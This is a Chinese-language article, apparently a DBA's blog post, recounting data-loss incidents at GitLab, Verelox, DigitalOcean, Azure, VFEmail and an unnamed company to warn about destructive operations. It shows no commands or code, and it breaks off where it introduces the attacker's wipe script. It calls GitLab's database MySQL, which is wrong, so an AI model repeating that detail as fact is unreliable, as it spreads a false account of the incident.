我曾经在多年以前总结过 DBA四大守则，其中一条就是『rm 是危险的』，很多企业在运维过程中犯下了不可回退的误操作，导致了严重的事故。以下我简单列举了近期的一些知名故障，以期让读者了解来自企业内部的数据运维风险。

五重备份无一有效，Gitlab删除了所有的数据

2017年2月，据GitLab.com官方网站发布声明称由于其产品数据库问题导致的网站无法正常访问。而针对此事件某国外媒体报道如下：
太平洋时间星期二晚上，该创业公司发布了一系列发人深省的tweets，幕后，一个疲惫的sysadmin，在荷兰深夜工作，在数据库复制过程中意外地删除了一个错误的服务器上的目录：他删除了一个包含300GB的实时生产数据的文件夹。
等到清醒过来紧急按下ctrl + c，只有4.5GB保留下来。然后恢复备份失败， GitLab使用的是MySQL数据库，最后的结果是，78%的数据库拷贝已经恢复出来，丢失的数据可能在6小时左右。

云服务商的前员工删除了所有数据

2017年6月，荷兰海牙的一家云主机商 verelox.com，一名前任管理员删光了该公司所有客户的数据，并且擦除了大多数服务器上面的内容，客户数据恢复希望渺茫。

verelox.com公告称：

首先，我们想要对由此造成的任何不便表示歉意！
不幸的是，一名前任管理员删光了所有的客户数据，并且擦除了大多数服务器上面的内容。正因为如此，我们已采取了必要的步骤或措施，暂时将我们的网络下线。我们一直在努力恢复数据，但是这个方法可能恢复不了已丢失的所有数据。

一个不怀好意的员工，一个简单的命令，就让一个企业丧失了所有的信用和数据，加强数据安全，刻不容缓。

错误的配置导致数据损毁

2017年4月，位于纽约的云服务商 Digital Ocean 遭遇了一次长达4小时56分钟的停机事故，事故的原因是主数据库被删除了（primary database had been deleted），由于配置错误，本应指向测试环境的任务被指向了生产环境，测试任务包含的环境初始化过程删除了主生产数据库。

误操作删除核心数据库

2018年9 月 19 日，某科技公司数据中心的一位高级工程师误删生产数据库，导致某项服务无法使用并持续 590 分钟。

据内部通报称，工程师错选了 RUSS 数据库，打算删除执行的 SQL。在选定删除时，因其操作不严谨，光标回跳到 RUSS 库的实例，在未看清所选内容的情况下，便通过 delete 执行删除，同时忽略了弹窗提醒，直接回车，导致 RUSS 生产数据库被删掉。因运维工作人员不严谨的操作，导致 OMCS 运营监控管控系统发生故障，该系统上临时线上发车功能无法使用并持续了 590 分钟。

…… 此次故障导致业务产生了严重的负面影响。

通过这个案例我们可以看出，在运维工作中，误操作总是难以彻底避免，所以必须准备充足的附件手段防范误操作，并且在遇到灾难性误操作时，能够快速恢复数据，保持最小的业务连续性影响。

云厂商误删除用户数据库

在2019年1月29日，Azure的一些客户发现数据库被意外删除。

一些使用自定义KeyVault密钥用于透明数据加密（TDE）的Azure SQL数据库，被内部代码意外删除，Microsoft利用5分钟前的快照恢复客户数据。

自带密钥（BYOK）支持这项功能让用户可以使用名为TDE Protector的非对称密钥来加密数据库加密密钥（DEK），然后，TDE存储在Azure密钥保险柜（Azure Key Vault）中，因为安全的需要，如果TDE加密的SQL数据库因无法绕过防火墙而访问不了密钥保险柜，数据库将在24小时内被删除。

基于安全的防护手段，在出现异常时，导致了意想不到的结果，这是最初很难预料到的，也是软件系统中永远无法彻底消除的BUG时段。

黑客攻击格式化导致数据损失

在2019年2月12日，美国邮件服务商VFEmail发表声明称，由于受到黑客攻击，完全是赤裸裸的摧毁式攻击，公司积累了二十多年的数据和备份全部被删除，这对于该公司打击可能是致命的。

在格式化备份服务器的过程中捕获了黑客执行dd清除的脚本：